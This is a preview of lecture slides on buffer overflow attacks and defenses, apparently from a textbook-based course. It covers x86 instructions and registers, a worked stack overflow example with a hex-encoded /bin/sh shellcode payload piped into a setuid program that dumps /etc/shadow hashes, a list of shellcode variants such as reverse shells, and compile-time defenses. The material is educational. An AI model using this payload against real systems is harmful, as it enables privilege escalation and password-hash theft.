Example unix shellcode common x86 assembly language

This preview shows page 20 - 27 out of 40 pages.

Example UNIX Shellcode
Image of page 20

Subscribe to view the full document.

Common x86 Assembly Language Instructions MOV src, dest copy (move) value from src into dest LEA src, dest copy the address (load effective address) of src into dest ADD / SUB src, dest add / sub value in src from dest leaving result in dest AND / OR / XOR src, dest logical and / or / xor value in src with dest leaving result in dest CMP val1, val2 compare val1 and val2, setting CPU flags as a result JMP / JZ / JNZ addr jump / if zero / if not zero to addr PUSH src push the value in src onto the stack POP dest pop the value on the top of the stack into dest CALL addr call function at addr LEAVE clean up stack frame before leaving function RET return from function INT num software interrupt to access operating system function NOP no operation or do nothing instruction
Image of page 21
x86 Registers 32 bit 16 bit 8 bit (high) 8 bit (low) Use %eax %ax %ah %al Accumulators used for arithmetical and I/O operations and execute interrupt calls %ebx %bx %bh %bl Base registers used to access memory, pass system call arguments and return values %ecx %cx %ch %cl Counter registers %edx %dx %dh %dl Data registers used for arithmetic operations, interrupt calls and IO operations %ebp Base Pointer containing the address of the current stack frame %eip Instruction Pointer or Program Counter containing the address of the next instruction to be executed %esi Source Index register used as a pointer for string or array operations %esp Stack Pointer containing the address of the top of stack
Image of page 22

Subscribe to view the full document.

$ dir -l buffer4 -rwsr-xr-x 1 root knoppix 16571 Jul 17 10:49 buffer4 $ whoami knoppix $ cat /etc/shadow cat: /etc/shadow: Permission denied $ cat attack1 perl -e 'print pack("H*", "90909090909090909090909090909090" . "90909090909090909090909090909090" . "9090eb1a5e31c08846078d1e895e0889" . "460cb00b89f38d4e088d560ccd80e8e1" . "ffffff2f62696e2f7368202020202020" . "202020202020202038fcffbfc0fbffbf0a"); print "whoami\n"; print "cat /etc/shadow\n";' $ attack1 | buffer4 Enter value for name: Hello your yyy)DA0Apy is e?^1AFF.../bin/sh... root root:$1$rNLId4rX$nka7JlxH7.4UJT4l9JRLk1:13346:0:99999:7::: daemon:*:11453:0:99999:7::: ... nobody:*:11453:0:99999:7::: knoppix:$1$FvZSBKBu$EdSFvuuJdKaCH8Y0IdnAv/:13346:0:99999:7::: ... Figure 10.9 Example Stack Overflow Attack
Image of page 23
Stack Overflow Variants target program can be: a trusted system utility network service daemon commonly used library code shellcode functions launch a remote shell when connected to create a reverse shell that connects back to the hacker use local exploits that establish a shell flush firewall rules that currently block other attacks break out of a chroot (restricted execution) environment, giving full access to the system
Image of page 24

Subscribe to view the full document.

Buffer Overflow Defenses buffer overflows are widely exploited two broad defense approaches compile-time aim to harden programs to resist attacks in new programs run-time aim to detect and abort attacks in existing programs
Image of page 25
Compile-Time Defenses: Programming Language use a modern high- level language – not vulnerable to buffer overflow attacks – compiler enforces range checks and permissible operations on variables disadvantages additional code must be executed at run time to impose checks flexibility and safety comes at a cost in resource use distance from the underlying machine
Image of page 26

Subscribe to view the full document.

Image of page 27

{[ snackBarMessage ]}

What students are saying

  • Left Quote Icon

    As a current student on this bumpy collegiate pathway, I stumbled upon Course Hero, where I can find study resources for nearly all my courses, get online help from tutors 24/7, and even share my old projects, papers, and lecture notes with other students.

    Student Picture

    Kiran Temple University Fox School of Business ‘17, Course Hero Intern

  • Left Quote Icon

    I cannot even describe how much Course Hero helped me this summer. It’s truly become something I can always rely on and help me. In the end, I was not only able to survive summer classes, but I was able to thrive thanks to Course Hero.

    Student Picture

    Dana University of Pennsylvania ‘17, Course Hero Intern

  • Left Quote Icon

    The ability to access any university’s resources through Course Hero proved invaluable in my case. I was behind on Tulane coursework and actually used UCLA’s materials to help me move forward and get everything together on time.

    Student Picture

    Jill Tulane University ‘16, Course Hero Intern